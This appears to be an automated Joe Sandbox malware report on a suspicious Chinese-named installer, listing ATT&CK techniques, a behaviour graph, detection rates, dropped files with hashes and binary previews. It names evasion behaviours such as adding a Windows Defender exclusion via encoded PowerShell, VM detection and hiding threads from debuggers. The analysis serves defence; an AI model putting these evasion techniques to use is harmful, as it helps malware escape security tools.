Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_0056AB2A GetSystemTimeAsFileTime,11_2_0056AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00600090 GetVersion,11_2_00600090
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2334194076.00000000011F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory331
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579778 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 90 Multi AV Scanner detection for submitted file 2->90 92 Found driver which could be used to inject code into processes 2->92 94 PE file contains section with special chars 2->94 96 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->96 10 #U5b89#U88c5#U52a9#U624b_2.0.6.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 30 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b_2.0.6.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 26 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U52a9#U624b_2.0.6.exe 2 19->35         started        38 powershell.exe 22 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 25 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b_2.0.6.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Program Files (x86)\...\trash (copy), PE32+ 55->80 dropped 82 C:\Program Files (x86)\...\is-8UMQQ.tmp, PE32+ 55->82 dropped 84 3 other files (1 malicious) 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_2.0.6.exe0%ReversingLabs
#U5b89#U88c5#U52a9#U624b_2.0.6.exe7%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc11%ReversingLabs
C:\Program Files (x86)\Windows NT\is-8UMQQ.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-6ITRF.tmp\update.vac11%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7RMSI.tmp\update.vac11%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drfalse
    high
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_2.0.6.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drfalse
          high
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007F7BB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2069328889.0000000000AF1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000000.2162499297.0000000000FFD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drfalse
              high
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007F7BB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2069328889.0000000000AF1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000000.2162499297.0000000000FFD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drfalse
                    high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579778
                    Start date and time:2024-12-23 09:09:48 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:108
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                    renamed because original name is a hash value
                    Original Sample Name:_2.0.6.exe
                    Detection:MAL
                    Classification:mal84.evad.winEXE@138/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 28
                    • Number of non-executed functions: 77
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                            #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                                Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                    Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):831200
                                      Entropy (8bit):6.671005303304742
                                      Encrypted:false
                                      SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                      MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                      SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                      SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                      SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                      • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                      • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):249968
                                      Entropy (8bit):7.99927878301746
                                      Encrypted:true
                                      SSDEEP:6144:5MLDlV3MdqekCZrPDP+wYg19iyvziHx3WuJFK/iPon8JC:yLDX3Md2oDPJBiyvzsx35JcAEP
                                      MD5:E2189A19182C781773E5E291B61A5E47
                                      SHA1:3F47ADA8A171B2985DCE45E9534DC595D9215039
                                      SHA-256:AA6F63F4B8720AB33572ECB533359D255423003DC37C6D9C171EE20F9717A41B
                                      SHA-512:2329C8637E3AD42ACDE2E547D68315E9750A15D499E781F14051D067BB4913FBDFCA5507894025D8D3C3570A69CD3B438C75C951849392D5497A9AB775192360
                                      Malicious:false
                                      Preview:.@S.......q.,..............Ho..M....Z<..3 .hM.pV.j.8.+r@...l.q...o7&2.@L/..^:..B..E..}).\).4....?..A..U.<......=.:.kt.^n..b...M..8....g@..z..|.Om.....[%.|.<.hn....i....Q.\....2M.@........=.M..Vu......%]......}J..:H.Q.c.F.`..Y..u..^d...q...t...a&.3.9....C....g.qi.F.,Q.M..e.).5.#.|........u...K#.e....}.c..B..g6.......#*5...6.5....t....../Pb.".S....Vx.Z].0...U..K.L......9u.. k.....XM.;.....<#.....u.|...K.B,h.B..:..^1H:..c..*...B&.HC..W.j..A......i..T.3....Q...R.W..|..=.........*l.sz.B.F...........+./..Va.........y...%c<^r2.d...5...k.,....r.z.JuP.M.q.....&...2.*=7...X..x./....ck_<1f.OZ>5.......{N..{.....F..".$su..Q...}*!.....S.ZZ&O..J5&...|fv&.......s.y@..%...'wci..."I..-|.R..7)..j.....r..\.g...|..(."e)..^.`.b.....!.;.+.c..l.).|}.0.B.....4.]~...........U..r..7A..B..w.lUdx8..{y+tr.@...Q..4J6..(ZS.4x....MB.w..o..M..z..kw..s.{...W...6.L.|m.B.B..q..m.....4.#..I...mu. ...g#1f...B.(.Jj.#....+....D.{3......... "...../....^/A.4.V...,.%
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3598848
                                      Entropy (8bit):7.004949099807939
                                      Encrypted:false
                                      SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                      MD5:1D1464C73252978A58AC925ECE57F0FB
                                      SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                      SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                      SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 11%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):5649408
                                      Entropy (8bit):6.392614480390128
                                      Encrypted:false
                                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):249968
                                      Entropy (8bit):7.99927878301746
                                      Encrypted:true
                                      SSDEEP:6144:5MLDlV3MdqekCZrPDP+wYg19iyvziHx3WuJFK/iPon8JC:yLDX3Md2oDPJBiyvzsx35JcAEP
                                      MD5:E2189A19182C781773E5E291B61A5E47
                                      SHA1:3F47ADA8A171B2985DCE45E9534DC595D9215039
                                      SHA-256:AA6F63F4B8720AB33572ECB533359D255423003DC37C6D9C171EE20F9717A41B
                                      SHA-512:2329C8637E3AD42ACDE2E547D68315E9750A15D499E781F14051D067BB4913FBDFCA5507894025D8D3C3570A69CD3B438C75C951849392D5497A9AB775192360
                                      Malicious:false
                                      Preview:.@S.......q.,..............Ho..M....Z<..3 .hM.pV.j.8.+r@...l.q...o7&2.@L/..^:..B..E..}).\).4....?..A..U.<......=.:.kt.^n..b...M..8....g@..z..|.Om.....[%.|.<.hn....i....Q.\....2M.@........=.M..Vu......%]......}J..:H.Q.c.F.`..Y..u..^d...q...t...a&.3.9....C....g.qi.F.,Q.M..e.).5.#.|........u...K#.e....}.c..B..g6.......#*5...6.5....t....../Pb.".S....Vx.Z].0...U..K.L......9u.. k.....XM.;.....<#.....u.|...K.B,h.B..:..^1H:..c..*...B&.HC..W.j..A......i..T.3....Q...R.W..|..=.........*l.sz.B.F...........+./..Va.........y...%c<^r2.d...5...k.,....r.z.JuP.M.q.....&...2.*=7...X..x./....ck_<1f.OZ>5.......{N..{.....F..".$su..Q...}*!.....S.ZZ&O..J5&...|fv&.......s.y@..%...'wci..."I..-|.R..7)..j.....r..\.g...|..(."e)..^.`.b.....!.;.+.c..l.).|}.0.B.....4.]~...........U..r..7A..B..w.lUdx8..{y+tr.@...Q..4J6..(ZS.4x....MB.w..o..M..z..kw..s.{...W...6.L.|m.B.B..q..m.....4.#..I...mu. ...g#1f...B.(.Jj.#....+....D.{3......... "...../....^/A.4.V...,.%
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):56530
                                      Entropy (8bit):7.99637651774541
                                      Encrypted:true
                                      SSDEEP:1536:QldiGQrAFpix02EAnKbWAjZSNFZaNkbVkZ:KdQSpixn0jZ8aNk2Z
                                      MD5:62408EF6D7BE391AF06FF367F7903B35
                                      SHA1:D2E8544834EAA45092C21ABDD35397F53A61BDF8
                                      SHA-256:583A6E6D26FD9D7D6975B554AC5D2CCD40CE043165DA10496BD816FD90A67BE3
                                      SHA-512:F7D4C73D4D2E6D77E1B7CAE1BB3D1BB5728EEDAD93F285B5CE4269F05D0BD18CD4D2A6B8E787BA4C4B68895829AB52794B76A75397FC9932675C4C27424FCB53
                                      Malicious:false
                                      Preview:.@S....K9..| ................W>.L.R.ap...-..E.t.r.p..k.....Kb.....G....3...93.....Q.FaG3..!K.ml=..AF?Q6.r....Hn]".;.....W....x.,...3-c..5.......Q.nU....F.D^z..........S.....e3....{.......K>........$r7.!...X..LL..L...(..h.._...`o<..;%3F.k.....).H........l..e..V=lp........3......"h...{..`@..b......T...2....../E.Jb....v..)...... .....a...zY.....+...A`../>....$....l.........}Y...h%6\..p.`((n.R...K...?2.Y..=..+..D.9.~.m23.6.-N2..6v..*........-G~23.W..!v .....y.X..hG".iw.;....TD....Z_Z. ..-..w$G....M.L......Nj..8......i.w.M.........4'UR.......@_L...6...@.%Y|5c...xX..4^.V...I..........]W. C...|..P.aka)B....R...N..=3z......^s..b[l.....d.7./...|....[}..vl....B..)U.o.......cIc`%..N5....^.q.46..IB(...5k....r`].W.i~.W.....&5..p(.....y%i....[.!..../.mU.h.H.=.....h....L^...9J~..d..}..L...u..8?.5...3l.u&.....>U......c=...4.|.YAI.J...G...7..l...ZZ.....P...4`.........q.....}#F.V.3V.....X....1.....c^.....na.P...f.XnT...I..S...:bH..".......%.k..{.v..:{M.-.(
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):56530
                                      Entropy (8bit):7.996376517745408
                                      Encrypted:true
                                      SSDEEP:768:5F38jWqODNfje3cm9SMYiRa8kvZLchG+VW2RmGoK8zgz/u2mf+gADbRfbfVx1T5L:nsjwdjex/YAa8kRSKgJdz/ugbRfbpeo
                                      MD5:3EE722D929C33891B48311FA072C2F9A
                                      SHA1:9FB8341A371FAAEC12868477C69DF5604733784A
                                      SHA-256:7CEB7F0967524EE351171162B79AD283D435BD0EDCE411FBFCE1B29421A4EB54
                                      SHA-512:6B4046540AE9B20699E0F8BE89558F52226F7297DAFB8810DF7812CD5429164C7AC8B689F51FDA3BE4EE374D5D86BCE0CAD9D1062066AB2C0FA577ACE5604B76
                                      Malicious:false
                                      Preview:7z..'......M........2............."...zI.r?.......pJ..8._...W.v-.9..8r{..J$M....h.`W.I.....6.....~m....8..WI5....c.jE.J4.6O+.+.[.B[|..?B?.&fu...'3.5..]CO .3....<T.+)..pN..6@..u`+.... H..D"....}..J.y...D0..m.j...z...%.a.a...*.|_.l..........9.wN.Mv....&:.iD.8[.bf.j.....j.(-1K....K~....O|...N...u..~..7s....C..d.js].=..U.S".Y...rD\7:j.].[....&,..u.LX`.s3.lJ..!.NR.Jv.G.:.....`@.Z.Z...`.......2...%qW..D.@..*..f.1.S.6......U..F2...n.c&...`qk....d.J....M....%...s.........XyW..)hq.....<..\0.]=..O.v2......}......a..~Zr1...V.C....~6.......+.b..;.q...bWy.R*...........j.x.0.RY...f@.j.....S....Y...;$S.<.......1..3..(1L..@.6#.R..zu......oT..L.d...E..:`.O..b..d1...[N.).i`.c........+......T.s.Q..]......`.G23..d....V.Whk.J..@(..Gjl2v ..SZPg.0...Ts....i......Y.w>.j|*:...t.L..o..i.^N.GEo.K...-`.V.K...Jjrpp.....f....a...1O...G..|{...;s..W....p....(.f......(...4ts(....[o..c....$-.@..*.MOB...[..e..s.`,....~..\...z...>...e..v]#...j.)9.1,q.'.A.K.I.E.....>...
